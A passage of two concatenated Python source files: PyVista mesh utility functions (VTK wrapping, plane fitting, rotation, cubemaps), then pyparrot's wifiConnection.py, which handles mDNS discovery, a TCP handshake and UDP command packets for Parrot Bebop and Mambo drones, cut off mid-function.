N Cells: 1
N Points: 3
X Bounds: 0.000e+00, 0.000e+00
Y Bounds: 0.000e+00, 1.000e+00
Z Bounds: 0.000e+00, 1.000e+00
N Arrays: 0
Wrap a VTK object.
>>> import pyvista
>>> import vtk
>>> points = vtk.vtkPoints()
>>> p = [1.0, 2.0, 3.0]
>>> vertices = vtk.vtkCellArray()
>>> pid = points.InsertNextPoint(p)
>>> _ = vertices.InsertNextCell(1)
>>> _ = vertices.InsertCellPoint(pid)
>>> point = vtk.vtkPolyData()
>>> _ = point.SetPoints(points)
>>> _ = point.SetVerts(vertices)
>>> mesh = pyvista.wrap(point)
>>> mesh # doctest:+SKIP
PolyData (0x7fc55ff27ad0)
N Cells: 1
N Points: 3
X Bounds: 0.000e+00, 0.000e+00
Y Bounds: 0.000e+00, 1.000e+00
Z Bounds: 0.000e+00, 1.000e+00
N Arrays: 0
"""
# Return if None
if dataset is None:
return
# Check if dataset is a numpy array. We do this first since
# pyvista_ndarray contains a VTK type that we don't want to
# directly wrap.
if isinstance(dataset, (np.ndarray, pyvista.pyvista_ndarray)):
if dataset.ndim == 1 and dataset.shape[0] == 3:
return pyvista.PolyData(dataset)
elif dataset.ndim == 2 and dataset.shape[1] == 3:
return pyvista.PolyData(dataset)
elif dataset.ndim == 3:
mesh = pyvista.UniformGrid(dataset.shape)
mesh['values'] = dataset.ravel(order='F')
mesh.active_scalars_name = 'values'
return mesh
else:
raise NotImplementedError('NumPy array could not be wrapped by pyvista.')
# wrap VTK arrays as pyvista_ndarray
if isinstance(dataset, _vtk.vtkDataArray):
return pyvista.pyvista_ndarray(dataset)
# Check if a dataset is a VTK type
if hasattr(dataset, 'GetClassName'):
key = dataset.GetClassName()
try:
return pyvista._wrappers[key](dataset)
except KeyError:
logging.warning(f'VTK data type ({key}) is not currently supported by pyvista.')
return
# wrap meshio
if is_meshio_mesh(dataset):
return from_meshio(dataset)
# wrap trimesh
if dataset.__class__.__name__ == 'Trimesh':
# trimesh doesn't pad faces
n_face = dataset.faces.shape[0]
faces = np.empty((n_face, 4), dataset.faces.dtype)
faces[:, 1:] = dataset.faces
faces[:, 0] = 3
return pyvista.PolyData(np.asarray(dataset.vertices), faces)
# otherwise, tell the user we can't wrap this object
raise NotImplementedError(f'Unable to wrap ({type(dataset)}) into a pyvista type.')
def image_to_texture(image):
"""Convert ``vtkImageData`` (:class:`pyvista.UniformGrid`) to a ``vtkTexture``.
Parameters
----------
image : pyvista.UniformGrid or vtkImageData
Image to convert.
Returns
-------
vtkTexture
VTK texture.
"""
return pyvista.Texture(image)
def numpy_to_texture(image):
"""Convert a NumPy image array to a vtk.vtkTexture.
Parameters
----------
image : numpy.ndarray
Numpy image array.
Returns
-------
vtkTexture
VTK texture.
"""
return pyvista.Texture(image)
def is_inside_bounds(point, bounds):
"""Check if a point is inside a set of bounds.
This is implemented recursively so that it works for N-dimensional points.
Parameters
----------
point : sequence
Three item cartesian point (i.e. ``[x, y, z]``).
bounds : sequence
Six item bounds in the form of ``(xMin, xMax, yMin, yMax, zMin, zMax)``.
Returns
-------
bool
``True`` when ``point`` is inside ``bounds``.
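Examples
--------
A minimal sketch of the expected behavior (plain Python sequences, no VTK needed).
>>> is_inside_bounds((0.5, 0.5, 0.5), (0, 1, 0, 1, 0, 1))
True
>>> is_inside_bounds((2.0, 0.5, 0.5), (0, 1, 0, 1, 0, 1))
False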
"""
if isinstance(point, (int, float)):
point = [point]
if isinstance(point, (np.ndarray, collections.abc.Sequence)) and not isinstance(point, collections.deque):
if len(bounds) < 2 * len(point) or len(bounds) % 2 != 0:
raise ValueError('Bounds do not match point dimensionality')
point = collections.deque(point)
bounds = collections.deque(bounds)
return is_inside_bounds(point, bounds)
if not isinstance(point, collections.deque):
raise TypeError(f'Unknown input data type ({type(point)}).')
if len(point) < 1:
return True
p = point.popleft()
lower, upper = bounds.popleft(), bounds.popleft()
if lower <= p <= upper:
return is_inside_bounds(point, bounds)
return False
def fit_plane_to_points(points, return_meta=False):
"""Fit a plane to a set of points using the SVD algorithm.
Parameters
----------
points : sequence
Size ``[N x 3]`` sequence of points to fit a plane through.
return_meta : bool, optional
If ``True``, also returns the center and normal used to
generate the plane.
Returns
-------
pyvista.PolyData
Plane mesh.
numpy.ndarray
Plane center if ``return_meta=True``.
numpy.ndarray
Plane normal if ``return_meta=True``.
Examples
--------
Fit a plane to a random point cloud.
>>> import pyvista
>>> import numpy as np
>>> cloud = np.random.random((10, 3))
>>> cloud[:, 2] *= 0.1
>>> plane, center, normal = pyvista.fit_plane_to_points(cloud, return_meta=True)
Plot the fitted plane.
>>> pl = pyvista.Plotter()
>>> _ = pl.add_mesh(plane, color='tan', style='wireframe', line_width=4)
>>> _ = pl.add_points(cloud, render_points_as_spheres=True,
... color='r', point_size=30)
>>> pl.show()
"""
data = np.array(points)
center = data.mean(axis=0)
result = np.linalg.svd(data - center)
normal = np.cross(result[2][0], result[2][1])
plane = pyvista.Plane(center=center, direction=normal)
if return_meta:
return plane, center, normal
return plane
def raise_not_matching(scalars, dataset):
"""Raise exception about inconsistencies.
Parameters
----------
scalars : numpy.ndarray
Array of scalars.
dataset : pyvista.DataSet
Dataset to check against.
Raises
------
ValueError
Raises a ValueError if the size of ``scalars`` does not match the dataset.
"""
if isinstance(dataset, _vtk.vtkTable):
raise ValueError(f'Number of scalars ({scalars.size}) must match number of rows ({dataset.n_rows}).')
raise ValueError(f'Number of scalars ({scalars.size}) '
f'must match either the number of points ({dataset.n_points}) '
f'or the number of cells ({dataset.n_cells}).')
def generate_plane(normal, origin):
"""Return a _vtk.vtkPlane.
Parameters
----------
normal : sequence
Three item sequence representing the normal of the plane.
origin : sequence
Three item sequence representing the origin of the plane.
Returns
-------
vtk.vtkPlane
VTK plane.
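Examples
--------
A hedged sketch (requires VTK); the normal is normalized to unit length before being set.
>>> plane = generate_plane((0, 0, 2), (0, 0, 0))
>>> plane.GetNormal() # doctest:+SKIP
(0.0, 0.0, 1.0)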
"""
plane = _vtk.vtkPlane()
# NORMAL MUST HAVE MAGNITUDE OF 1
normal = normal / np.linalg.norm(normal)
plane.SetNormal(normal)
plane.SetOrigin(origin)
return plane
def try_callback(func, *args):
"""Wrap a given callback in a try statement.
Parameters
----------
func : callable
Callable object.
*args
Any arguments.
"""
try:
func(*args)
except Exception:
etype, exc, tb = sys.exc_info()
stack = traceback.extract_tb(tb)[1:]
formatted_exception = \
'Encountered issue in callback (most recent call last):\n' + \
''.join(traceback.format_list(stack) +
traceback.format_exception_only(etype, exc)).rstrip('\n')
logging.warning(formatted_exception)
def check_depth_peeling(number_of_peels=100, occlusion_ratio=0.0):
"""Check if depth peeling is available.
Attempts to use depth peeling to see if it is available for the
current environment. Returns ``True`` if depth peeling is
available and has been successfully leveraged, otherwise
``False``.
Parameters
----------
number_of_peels : int, optional
Maximum number of depth peels.
occlusion_ratio : float, optional
Occlusion ratio.
Returns
-------
bool
``True`` when system supports depth peeling with the specified
settings.
"""
# Try Depth Peeling with a basic scene
source = _vtk.vtkSphereSource()
mapper = _vtk.vtkPolyDataMapper()
mapper.SetInputConnection(source.GetOutputPort())
actor = _vtk.vtkActor()
actor.SetMapper(mapper)
# requires opacity < 1
actor.GetProperty().SetOpacity(0.5)
renderer = _vtk.vtkRenderer()
renderWindow = _vtk.vtkRenderWindow()
renderWindow.AddRenderer(renderer)
renderWindow.SetOffScreenRendering(True)
renderWindow.SetAlphaBitPlanes(True)
renderWindow.SetMultiSamples(0)
renderer.AddActor(actor)
renderer.SetUseDepthPeeling(True)
renderer.SetMaximumNumberOfPeels(number_of_peels)
renderer.SetOcclusionRatio(occlusion_ratio)
renderWindow.Render()
return renderer.GetLastRenderingUsedDepthPeeling() == 1
def threaded(fn):
"""Call a function using a thread.
Parameters
----------
fn : callable
Callable object.
Returns
-------
function
Wrapped function.
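Examples
--------
A hedged usage sketch; the wrapper returns the already-started ``Thread``.
>>> @threaded
... def work(message):
...     print(message)
>>> thread = work('running in a background thread') # doctest:+SKIP
>>> thread.join() # doctest:+SKIP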
"""
def wrapper(*args, **kwargs):
thread = Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
class conditional_decorator:
"""Conditional decorator for methods.
Parameters
----------
dec : callable
Decorator to apply when the condition is matched.
condition : bool
Condition to match.
"""
def __init__(self, dec, condition):
"""Initialize."""
self.decorator = dec
self.condition = condition
def __call__(self, func):
"""Call the decorated function if condition is matched."""
if not self.condition:
# Return the function unchanged, not decorated.
return func
return self.decorator(func)
class ProgressMonitor():
"""A standard class for monitoring the progress of a VTK algorithm.
This must be used in a ``with`` context, and it will block keyboard
interrupts until the exit event, as interrupts would crash the kernel
if the VTK algorithm were still executing.
Parameters
----------
algorithm
VTK algorithm or filter.
message : str, optional
Message to display in the progress bar.
scaling : float, optional
Unused keyword argument.
"""
def __init__(self, algorithm, message="", scaling=100):
"""Initialize observer."""
try:
from tqdm import tqdm
except ImportError:
raise ImportError("Please install `tqdm` to monitor algorithms.")
self.event_type = _vtk.vtkCommand.ProgressEvent
self.progress = 0.0
self._last_progress = self.progress
self.algorithm = algorithm
self.message = message
self._interrupt_signal_received = False
self._old_progress = 0
self._old_handler = None
self._progress_bar = None
def handler(self, sig, frame):
"""Pass signal to custom interrupt handler."""
self._interrupt_signal_received = (sig, frame)
logging.debug('SIGINT received. Delaying KeyboardInterrupt until '
'VTK algorithm finishes.')
def __call__(self, obj, event, *args):
"""Call progress update callback.
On an event occurrence, this function executes.
"""
if self._interrupt_signal_received:
obj.AbortExecuteOn()
else:
progress = obj.GetProgress()
step = progress - self._old_progress
self._progress_bar.update(step)
self._old_progress = progress
def __enter__(self):
"""Enter event for ``with`` context."""
from tqdm import tqdm
# check if in main thread
if threading.current_thread().__class__.__name__ == '_MainThread':
self._old_handler = signal.signal(signal.SIGINT, self.handler)
self._progress_bar = tqdm(total=1, leave=True,
bar_format='{l_bar}{bar}[{elapsed}<{remaining}]')
self._progress_bar.set_description(self.message)
self.algorithm.AddObserver(self.event_type, self)
return self._progress_bar
def __exit__(self, type, value, traceback):
"""Exit event for ``with`` context."""
self._progress_bar.total = 1
self._progress_bar.refresh()
self._progress_bar.close()
self.algorithm.RemoveObservers(self.event_type)
if threading.current_thread().__class__.__name__ == '_MainThread':
signal.signal(signal.SIGINT, self._old_handler)
def abstract_class(cls_):
"""Decorate a class, overriding __new__.
Prevents a class from being instantiated, similar to ``abc.ABCMeta``,
but does not require an abstract method.
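Examples
--------
A hedged sketch: the decorated base raises on instantiation, subclasses do not.
>>> @abstract_class
... class Base:
...     pass
>>> class Child(Base):
...     pass
>>> child = Child()
>>> Base() # doctest:+SKIP
Traceback (most recent call last):
TypeError: Base is an abstract class and may not be instantiated.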
"""
def __new__(cls, *args, **kwargs):
if cls is cls_:
raise TypeError(f'{cls.__name__} is an abstract class and may not be instantiated.')
return object.__new__(cls)
cls_.__new__ = __new__
return cls_
def axis_rotation(points, angle, inplace=False, deg=True, axis='z'):
"""Rotate points angle (in deg) about an axis.
Parameters
----------
points : numpy.ndarray
Array of points with shape ``(N, 3)``
angle : float
Rotation angle.
inplace : bool, optional
Updates points in-place while returning nothing.
deg : bool, optional
If `True`, the angle is interpreted as degrees instead of
radians. Default is `True`.
axis : str, optional
Name of axis to rotate about. Valid options are ``'x'``, ``'y'``,
and ``'z'``. Default value is ``'z'``.
Returns
-------
numpy.ndarray
Rotated points.
Examples
--------
Rotate a set of points by 90 degrees about the x-axis in-place.
>>> import numpy as np
>>> import pyvista
>>> from pyvista import examples
>>> points = examples.load_airplane().points
>>> points_orig = points.copy()
>>> pyvista.axis_rotation(points, 90, axis='x', deg=True, inplace=True)
>>> assert np.all(np.isclose(points[:, 0], points_orig[:, 0]))
>>> assert np.all(np.isclose(points[:, 1], -points_orig[:, 2]))
>>> assert np.all(np.isclose(points[:, 2], points_orig[:, 1]))
"""
axis = axis.lower()
axis_to_vec = {
'x': (1, 0, 0),
'y': (0, 1, 0),
'z': (0, 0, 1)
}
if axis not in axis_to_vec:
raise ValueError('Invalid axis. Must be either "x", "y", or "z"')
rot_mat = transformations.axis_angle_rotation(axis_to_vec[axis], angle, deg=deg)
return transformations.apply_transformation_to_points(rot_mat, points, inplace=inplace)
def cubemap(path='', prefix='', ext='.jpg'):
"""Construct a cubemap from 6 images.
Each of the 6 images must be in the following format:
- <prefix>negx<ext>
- <prefix>negy<ext>
- <prefix>negz<ext>
- <prefix>posx<ext>
- <prefix>posy<ext>
- <prefix>posz<ext>
Prefix may be empty, and the extension defaults to ``'.jpg'``.
For example, if you have 6 images with the skybox2 prefix:
- ``'skybox2-negx.jpg'``
- ``'skybox2-negy.jpg'``
- ``'skybox2-negz.jpg'``
- ``'skybox2-posx.jpg'``
- ``'skybox2-posy.jpg'``
- ``'skybox2-posz.jpg'``
Parameters
----------
path : str, optional
Directory containing the cubemap images.
prefix : str, optional
Prefix to the filename.
ext : str, optional
The filename extension. For example ``'.jpg'``.
Returns
-------
pyvista.Texture
Texture with cubemap.
Examples
--------
>>> import pyvista
>>> skybox = pyvista.cubemap('my_directory', 'skybox', '.jpeg') # doctest:+SKIP
"""
sets = ['posx', 'negx', 'posy', 'negy', 'posz', 'negz']
image_paths = [os.path.join(path, f'{prefix}{suffix}{ext}') for suffix in sets]
for image_path in image_paths:
if not os.path.isfile(image_path):
file_str = '\n'.join(image_paths)
raise FileNotFoundError(f'Unable to locate {image_path}\n'
'Expected to find the following files:\n'
f'{file_str}')
texture = pyvista.Texture()
texture.SetMipmap(True)
texture.SetInterpolate(True)
texture.cube_map = True # Must be set prior to setting images
# add each image to the cubemap
for i, fn in enumerate(image_paths):
image = pyvista.read(fn)
flip = _vtk.vtkImageFlip()
flip.SetInputDataObject(image)
flip.SetFilteredAxis(1) # flip y axis
flip.Update()
texture.SetInputDataObject(i, flip.GetOutput())
return texture
|
wifiConnection.py
|
"""
Holds all the data and commands needed to fly a Bebop drone.
Author: Amy McGovern, dramymcgovern@gmail.com
"""
from zeroconf import ServiceBrowser, Zeroconf
from datetime import datetime
import time
import socket
import ipaddress
import json
from pyparrot.utils.colorPrint import color_print
import struct
import threading
from pyparrot.commandsandsensors.DroneSensorParser import get_data_format_and_size
class mDNSListener(object):
"""
This is adapted from the listener code at
https://pypi.python.org/pypi/zeroconf
"""
def __init__(self, wifi_connection):
self.wifi_connection = wifi_connection
def remove_service(self, zeroconf, type, name):
#print("Service %s removed" % (name,))
pass
def add_service(self, zeroconf, type, name):
info = zeroconf.get_service_info(type, name)
print("Service %s added, service info: %s" % (name, info))
self.wifi_connection._connect_listener_called(info)
class WifiConnection:
def __init__(self, drone, drone_type="Bebop2"):
"""
Can be a connection to a Bebop, Bebop2 or a Mambo right now
:param type: type of drone to connect to
"""
self.is_connected = False
if (drone_type not in ("Bebop", "Bebop2", "Mambo")):
color_print("Error: only type Bebop and Mambo are currently supported", "ERROR")
return
self.drone = drone
self.drone_type = drone_type
self.udp_send_port = 44444 # defined during the handshake except not on Mambo after 3.0.26 firmware
self.udp_receive_port = 43210
self.is_listening = True # for the UDP listener
if (drone_type is "Bebop"):
self.mdns_address = "_arsdk-0901._udp.local."
#Bebop video streaming
self.stream_port = 55004
self.stream_control_port = 55005
elif (drone_type is "Bebop2"):
self.mdns_address = "_arsdk-090c._udp.local."
#Bebop video streaming
self.stream_port = 55004
self.stream_control_port = 55005
elif (drone_type is "Mambo"):
self.mdns_address = "_arsdk-090b._udp.local."
# map of the data types by name (for outgoing packets)
self.data_types_by_name = {
'ACK' : 1,
'DATA_NO_ACK': 2,
'LOW_LATENCY_DATA': 3,
'DATA_WITH_ACK' : 4
}
# map of the incoming data types by number (to figure out if we need to ack etc)
self.data_types_by_number = {
1 : 'ACK',
2 : 'DATA_NO_ACK',
3 : 'LOW_LATENCY_DATA',
4 : 'DATA_WITH_ACK'
}
self.sequence_counter = {
'PONG': 0,
'SEND_NO_ACK': 0,
'SEND_WITH_ACK': 0,
'SEND_HIGH_PRIORITY': 0,
'VIDEO_ACK': 0,
'ACK_DRONE_DATA': 0,
'NO_ACK_DRONE_DATA': 0,
'VIDEO_DATA': 0,
}
self.buffer_ids = {
'PING': 0, # pings from device
'PONG': 1, # respond to pings
'SEND_NO_ACK': 10, # not-ack commandsandsensors (piloting and camera rotations)
'SEND_WITH_ACK': 11, # ack commandsandsensors (all piloting commandsandsensors)
'SEND_HIGH_PRIORITY': 12, # emergency commandsandsensors
'VIDEO_ACK': 13, # ack for video
'ACK_DRONE_DATA' : 127, # drone data that needs an ack
'NO_ACK_DRONE_DATA' : 126, # data from drone (including battery and others), no ack
'VIDEO_DATA' : 125, # video data
'ACK_FROM_SEND_WITH_ACK': 139 # 128 + buffer id for 'SEND_WITH_ACK' is 139
}
self.data_buffers = (self.buffer_ids['ACK_DRONE_DATA'], self.buffer_ids['NO_ACK_DRONE_DATA'])
# store whether a command was acked
self.command_received = {
'SEND_WITH_ACK': False,
'SEND_HIGH_PRIORITY': False,
'ACK_COMMAND': False
}
# maximum number of times to try a packet before assuming it failed
self.max_packet_retries = 1
# threading lock for waiting
self._lock = threading.Lock()
def connect(self, num_retries):
"""
Connects to the drone
:param num_retries: maximum number of retries
:return: True if the connection succeeded and False otherwise
"""
if ("Mambo" not in self.drone_type):
print("Setting up mDNS listener since this is not a Mambo")
#parrot's latest mambo firmware (3.0.26) broke all of the mDNS services, so mDNS is (temporarily)
#skipped for the Mambo; this code is backwards compatible and works with the hard-coded addresses for now.
zeroconf = Zeroconf()
listener = mDNSListener(self)
print("Making a browser for %s" % self.mdns_address)
browser = ServiceBrowser(zeroconf, self.mdns_address , listener)
# basically have to sleep until the info comes through on the listener
num_tries = 0
while (num_tries < num_retries and not self.is_connected):
time.sleep(1)
num_tries += 1
# if we didn't hear the listener, return False
if (not self.is_connected):
color_print("connection failed: did you remember to connect your machine to the Drone's wifi network?", "ERROR")
return False
else:
browser.cancel()
# perform the handshake and get the UDP info
handshake = self._handshake(num_retries)
if (handshake):
self._create_udp_connection()
self.listener_thread = threading.Thread(target=self._listen_socket)
self.listener_thread.start()
color_print("Success in setting up the wifi network to the drone!", "SUCCESS")
return True
else:
color_print("Error: TCP handshake failed.", "ERROR")
return False
def _listen_socket(self):
"""
Listens to the socket and sleeps in between receives.
Runs forever (until disconnect is called)
"""
print("starting listening at ")
data = None
while (self.is_listening):
try:
(data, address) = self.udp_receive_sock.recvfrom(66000)
except socket.timeout:
print("timeout - trying again")
except:
pass
self.handle_data(data)
color_print("disconnecting", "INFO")
self.disconnect()
def handle_data(self, data):
"""
Handles the data as it comes in
:param data: raw data packet
:return:
"""
# got the idea of how to handle this data nicely (handling any extra data in the packets)
# and unpacking the critical info first (id, size etc) from
# https://github.com/N-Bz/bybop/blob/8d4c569c8e66bd1f0fdd768851409ca4b86c4ecd/src/Bybop_NetworkAL.py
my_data = data
while (my_data):
#print("inside loop to handle data ")
(data_type, buffer_id, packet_seq_id, packet_size) = struct.unpack('<BBBI', my_data[0:7])
recv_data = my_data[7:packet_size]
#print("\tgot a data type of of %d " % data_type)
#print("\tgot a buffer id of of %d " % buffer_id)
#print("\tgot a packet seq id of of %d " % packet_seq_id)
#print("\tsize is %d" % packet_size)
self.handle_frame(data_type, buffer_id, packet_seq_id, recv_data)
# loop in case there is more data
my_data = my_data[packet_size:]
#print("assigned more data")
#print("ended loop handling data")
def handle_frame(self, packet_type, buffer_id, packet_seq_id, recv_data):
if (buffer_id == self.buffer_ids['PING']):
#color_print("this is a ping! need to pong", "INFO")
self._send_pong(recv_data)
if (self.data_types_by_number[packet_type] == 'ACK'):
#print("setting command received to true")
ack_seq = int(struct.unpack("<B", recv_data)[0])
self._set_command_received('SEND_WITH_ACK', True, ack_seq)
self.ack_packet(buffer_id, ack_seq)
elif (self.data_types_by_number[packet_type] == 'DATA_NO_ACK'):
#print("DATA NO ACK")
if (buffer_id in self.data_buffers):
self.drone.update_sensors(packet_type, buffer_id, packet_seq_id, recv_data, ack=False)
elif (self.data_types_by_number[packet_type] == 'LOW_LATENCY_DATA'):
print("Need to handle Low latency data")
elif (self.data_types_by_number[packet_type] == 'DATA_WITH_ACK'):
#print("DATA WITH ACK")
if (buffer_id in self.data_buffers):
self.drone.update_sensors(packet_type, buffer_id, packet_seq_id, recv_data, ack=True)
else:
color_print("HELP ME", "ERROR")
print("got a different type of data - help")
def _send_pong(self, data):
"""
Send a PONG back to a PING
:param data: data that needs to be PONG/ACK'd
:return: nothing
"""
size = len(data)
self.sequence_counter['PONG'] = (self.sequence_counter['PONG'] + 1) % 256
packet = struct.pack("<BBBI", self.data_types_by_name['DATA_NO_ACK'], self.buffer_ids['PONG'],
self.sequence_counter['PONG'], size + 7)
packet += data
self.safe_send(packet)
def _set_command_received(self, channel, val, seq_id):
"""
Set the command received on the specified channel to the specified value (used for acks)
:param channel: channel
:param val: True or False
:return:
"""
self.command_received[(channel, seq_id)] = val
def _is_command_received(self, channel, seq_id):
"""
Is the command received?
:param channel: channel it was sent on
:param seq_id: sequence id of the command
:return:
"""
return self.command_received[(channel, seq_id)]
def _handshake(self, num_retries):
"""
Performs the handshake over TCP to get all the connection info
:return: True if it worked and False otherwise
"""
# create the TCP socket for the handshake
tcp_sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
#print (self.connection_info.address, self.connection_info.port)
#print(ipaddress.IPv4Address(self.connection_info.address))
# connect
# handle the broken mambo firmware by hard-coding the port and IP address
if ("Mambo" in self.drone_type):
self.drone_ip = "192.168.99.3"
tcp_sock.connect(("192.168.99.3", 44444))
else:
self.drone_ip = ipaddress.IPv4Address(self.connection_info.address).exploded
tcp_sock.connect((self.drone_ip, self.connection_info.port))
# send the handshake information
if(self.drone_type in ("Bebop", "Bebop2")):
# For Bebop add video stream ports to the json request
json_string = json.dumps({"d2c_port":self.udp_receive_port,
"controller_type":"computer",
"controller_name":"pyparrot",
"arstream2_client_stream_port":self.stream_port,
"arstream2_client_control_port":self.stream_control_port})
else:
json_string = json.dumps({"d2c_port":self.udp_receive_port,
"controller_type":"computer",
"controller_name":"pyparrot"})
json_obj = json.loads(json_string)
print(json_string)
try:
# python 3
tcp_sock.send(bytes(json_string, 'utf-8'))
except:
# python 2
tcp_sock.send(json_string)
# wait for the response
finished = False
num_try = 0
while (not finished and num_try < num_retries):
data = tcp_sock.recv(4096).decode('utf-8')
if (len(data) > 0):
my_data = data[0:-1]
self.udp_data = json.loads(str(my_data))
# if the drone refuses the connection, return false
if (self.udp_data['status'] != 0):
return False
print(self.udp_data)
self.udp_send_port = self.udp_data['c2d_port']
print("c2d_port is %d" % self.udp_send_port)
finished = True
else:
num_try += 1
# cleanup
tcp_sock.close()
return finished
def _create_udp_connection(self):
"""
Create the UDP connection
"""
self.udp_send_sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
#self.udp_send_sock.connect((self.drone_ip, self.udp_send_port))
self.udp_receive_sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
# don't use the connect, use bind instead
# learned from bybop code
# https://github.com/N-Bz/bybop/blob/8d4c569c8e66bd1f0fdd768851409ca4b86c4ecd/src/Bybop_NetworkAL.py
#self.udp_receive_sock.connect((self.drone_ip, self.udp_receive_port))
self.udp_receive_sock.settimeout(5.0)
#Some computers were hitting a connection refused (or similar) error here.
#Setting SO_REUSEADDR on both sockets resolves it (at least on the machines tested).
self.udp_receive_sock.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
self.udp_send_sock.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
self.udp_receive_sock.bind(('0.0.0.0', int(self.udp_receive_port)))
def _connect_listener_called(self, connection_info):
"""
Save the connection info and set connected to true. This is called within the listener
for the connection.
:param connection_info:
:return:
"""
self.connection_info = connection_info
self.is_connected = True
def disconnect(self):
"""
Disconnect cleanly from the sockets
"""
self.is_listening = False
# Sleep for a moment to allow all socket activity to cease before closing
# This helps to avoid a Winsock error regarding operations on a closed socket
self.smart_sleep(0.5)
# then put the close in a try/except to catch any further winsock errors
# the errors seem to be mostly occurring on windows for some reason
try:
self.udp_receive_sock.close()
self.udp_send_sock.close()
except:
pass
def safe_send(self, packet):
packet_sent = False
#print "inside safe send"
try_num = 0
while (not packet_sent and try_num < self.max_packet_retries):
try:
self.udp_send_sock.sendto(packet, (self.drone_ip, self.udp_send_port))
packet_sent = True
except:
#print "resetting connection"
self.udp_send_sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
#self.udp_send_sock.connect((self.drone_ip, self.udp_send_port))
try_num += 1
def send_command_packet_ack(self, packet, seq_id):
"""
Sends the actual packet on the ack channel. Internal function only.
:param packet: packet constructed according to the command rules (variable size, constructed elsewhere)
:return: True if the command was sent and False otherwise
"""
try_num = 0
self._set_command_received('SEND_WITH_ACK', False, seq_id)
while (try_num < self.max_packet_retries and not self._is_command_received('SEND_WITH_ACK', seq_id)):
color_print("sending packet on try %d", try_num)
self.safe_send(packet)
try_num += 1
self.smart_sleep(0.5)
return self._is_command_received('SEND_WITH_ACK', seq_id)
def send_command_packet_noack(self, packet):
"""
Sends the actual packet on the No-ack channel. Internal function only.
:param packet: packet constructed according to the command rules (variable size, constructed elsewhere)
:return: nothing (no-ack commands cannot be confirmed)
"""
try_num = 0
color_print("sending packet on try %d", try_num)
self.safe_send(packet)
def send_noparam_high_priority_command_packet(self, command_tuple):
"""
Send a no parameter command packet on the high priority channel
:param command_tuple:
:return:
"""
self.sequence_counter['SEND_HIGH_PRIORITY'] = (self.sequence_counter['SEND_HIGH_PRIORITY'] + 1) % 256
packet = struct.pack("<BBBIBBH", self.data_types_by_name['LOW_LATENCY_DATA'],
self.buffer_ids['SEND_HIGH_PRIORITY'],
self.sequence_counter['SEND_HIGH_PRIORITY'], 11,
command_tuple[0], command_tuple[1], command_tuple[2])
self.safe_send(packet)
def send_noparam_command_packet_ack(self, command_tuple):
"""
Send a no parameter command packet on the ack channel
:param command_tuple:
:return:
"""
self.sequence_counter['SEND_WITH_ACK'] = (self.sequence_counter['SEND_WITH_ACK'] + 1) % 256
packet = struct.pack("<BBBIBBH", self.data_types_by_name['DATA_WITH_ACK'],
self.buffer_ids['SEND_WITH_ACK'],
self.sequence_counter['SEND_WITH_ACK'], 11,
command_tuple[0], command_tuple[1], command_tuple[2])
return self.send_command_packet_ack(packet, self.sequence_counter['SEND_WITH_ACK'])
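# Hedged note on the layout used above (added for illustration): '<BBBIBBH'
# is the 7-byte frame header (type u8, buffer u8, sequence u8, size u32)
# followed by the 4-byte command tuple (project u8, class u8, command u16),
# 11 bytes in total -- hence the literal 11 passed as the frame size.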
def send_param_command_packet(self, command_tuple, param_tuple=None, param_type_tuple=0,ack=True):
"""
Send a command packet with parameters. Ack channel is optional for future flexibility,
but currently commands are always sent over the Ack channel, so it defaults to True.
Contributed by awm102 on github
:param: command_tuple: the command tuple derived from command_parser.get_command_tuple()
:param: param_tuple (optional): the parameter values to be sent (can be found in the XML files)
:param: param_type_tuple (optional): a tuple of strings representing the data types of the parameters
e.g. u8, float etc. (can be found in the XML files)
:param: ack (optional): allows ack to be turned off if required
:return:
"""
# TODO: This function could potentially be extended to encompass send_noparam_command_packet_ack
# and send_enum_command_packet_ack if desired for more modular code.
# TODO: The function could be improved by looking up the parameter data types in the xml files
# in the same way the send_enum_command_packet_ack does.
# Create lists to store the number of bytes and pack chars needed for parameters.
# Default them to empty so the packet size is still correct when no params are provided.
param_size_list = []
pack_char_list = []
if param_tuple is not None:
param_size_list = [0] * len(param_tuple)
pack_char_list = [0] * len(param_tuple)
# Fetch the parameter sizes. By looping over the param_tuple we only get the data
# for requested parameters so a mismatch in params and types does not matter
for i,param in enumerate(param_tuple):
pack_char_list[i], param_size_list[i] = get_data_format_and_size(param, param_type_tuple[i])
if ack:
ack_string = 'SEND_WITH_ACK'
data_ack_string = 'DATA_WITH_ACK'
else:
ack_string = 'SEND_NO_ACK'
data_ack_string = 'DATA_NO_ACK'
# Construct the base packet
self.sequence_counter[ack_string] = (self.sequence_counter[ack_string] + 1) % 256
# Calculate packet size:
# base packet <BBBIBBH is 11 bytes, param_size_list can be added up
packet_size = 11 + sum(param_size_list)
packet = struct.pack("<BBBIBBH", self.data_types_by_name[data_ack_string],
self.buffer_ids[ack_string],
self.sequence_counter[ack_string], packet_size,
command_tuple[0], command_tuple[1], command_tuple[2])
if param_tuple is not None:
# Add in the parameter values based on their sizes
for i,param in enumerate(param_tuple):
packet += struct.pack(pack_char_list[i],param)
if ack:
return self.send_command_packet_ack(packet, self.sequence_counter['SEND_WITH_ACK'])
else:
return self.send_command_packet_noack(packet)
def send_single_pcmd_command(self, command_tuple, roll, pitch, yaw, vertical_movement):
"""
Send a single PCMD command with the specified roll, pitch, and yaw. Note that
this does not make the command run forever; it is sent ONCE. It can be called
in a loop (in your agent) for smoother control than the duration option gives.
:param command_tuple: command tuple per the parser
:param roll:
:param pitch:
:param yaw:
:param vertical_movement:
"""
self.sequence_counter['SEND_NO_ACK'] = (self.sequence_counter['SEND_NO_ACK'] + 1) % 256
packet = struct.pack("<BBBIBBHBbbbbI",
self.data_types_by_name['DATA_NO_ACK'],
self.buffer_ids['SEND_NO_ACK'],
self.sequence_counter['SEND_NO_ACK'],
20,
command_tuple[0], command_tuple[1], command_tuple[2],
1, roll, pitch, yaw, vertical_movement, 0)
self.safe_send(packet)
def send_pcmd_command(self, command_tuple, roll, pitch, yaw, vertical_movement, duration):
"""
Send the PCMD command with the specified roll, pitch, and yaw
:param command_tuple: command tuple per the parser
:param roll:
:param pitch:
:param yaw:
:param vertical_movement:
:param duration:
"""
start_time = datetime.now()
new_time = datetime.now()
diff = (new_time - start_time).seconds + ((new_time - start_time).microseconds / 1000000.0)
while (diff < duration):
